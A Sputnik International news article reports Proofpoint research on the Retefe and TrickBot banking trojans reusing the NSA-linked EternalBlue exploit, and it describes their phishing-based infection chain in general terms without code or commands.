- Sputnik International
Get the latest news from around the world, live coverage, off-beat stories, features and analysis.

WannaCry Some More? Cybercriminals Using NSA Hacking Tools to Attack Citizens

© Sputnik / Vladimir Trefilov / Go to the mediabankRansomware attacks global IT systems
Ransomware attacks global IT systems - Sputnik International
A cybersecurity firm has announced hacking tools linked to the US National Security Agency are being exploited by cybercriminals.

NSA-linked hacking tools are being used by cybercriminals in efforts to remotely steal money and confidential information from online banking users, according to research conducted by cybersecurity firm Proofpoint.

Proofpoint researchers discovered two different banking trojans in the wild, with computer code taken from a now-publicly available exploit known as "EternalBlue" (CVE-2017-0144).

EternalBlue is used by the NSA to gather intelligence, and targets a vulnerability in Microsoft's Server Message Block protocol, which affects outdated versions of several different Microsoft operating systems. It allows hackers to quickly compromise multiple computers on a shared network, as long as they are all similarly running dated software.

A hooded man holds a laptop computer as blue screen with an exclamation mark is projected on him in this illustration picture taken on May 13, 2017 - Sputnik International
How 'NSA's Toolbox' Was Used by the Masterminds of the 'WannaCry' Epidemic
Patching Windows can take a very long for organizations if they are suitably large — often, exploits that are several years old can still be successfully used in attacks. Evidently, as long as threat actors continue to find widespread, unpatched vulnerabilities, they will continue to leverage exploits such as EternalBlue.

Trojan Duo

The two Trojans — Retefe and TrickBot — are relatively common, and have been in use for several months as part of various email phishing campaigns targeted at companies and individual users. The latest versions of these trojans carry elements of EternalBlue.

The new variant of Retefe identified by Proofpoint was sent in an unsolicited email to a company, containing a malicious Microsoft Office document laden with embedded Package Shell Objects. When opened, a PowerShell command launches a download for a.zip archive holding an obfuscated JavaScript installer, hosted on a remote server. The end result is the installation of a virus that leverages EternalBlue to quickly spread inside an infected network.

Cyberattack - Sputnik International
GCHQ Warns of Massive Looming Cyberattack That Will Demand 'National Response'
Retefe has been largely used in attacks against banks in Austria, Sweden, Switzerland, Japan and the United Kingdom, according to researchers. While it has never reached the scale or notoriety of better-known banking Trojans such as Dridex or Zeus, Retefe is notable for its consistent regional focus, and interesting implementation, Proofpoint note.

Nonetheless, the use of EternalBlue doesn't appear to be focused or aimed at one specific industry or region, and there is no common theme in terms of targeting for attacks leveraging EternalBlue. Attackers appear to be pursuing both disruptive and destructive ends, as with WannaCry — which was also propagated via EternalBlue.

In the past, EternalBlue exploits have been used tandem with ransomware to extort money from businesses. It's not entirely clear who is behind Retefe or Trickbot, although a relatively small group is thought to be behind the spread of Retefe.

The EternalBlue exploit first became publicly known — and adoptable — following the publication of a package of NSA documents by a group known as The Shadow Brokers.

To participate in the discussion
log in or register
Заголовок открываемого материала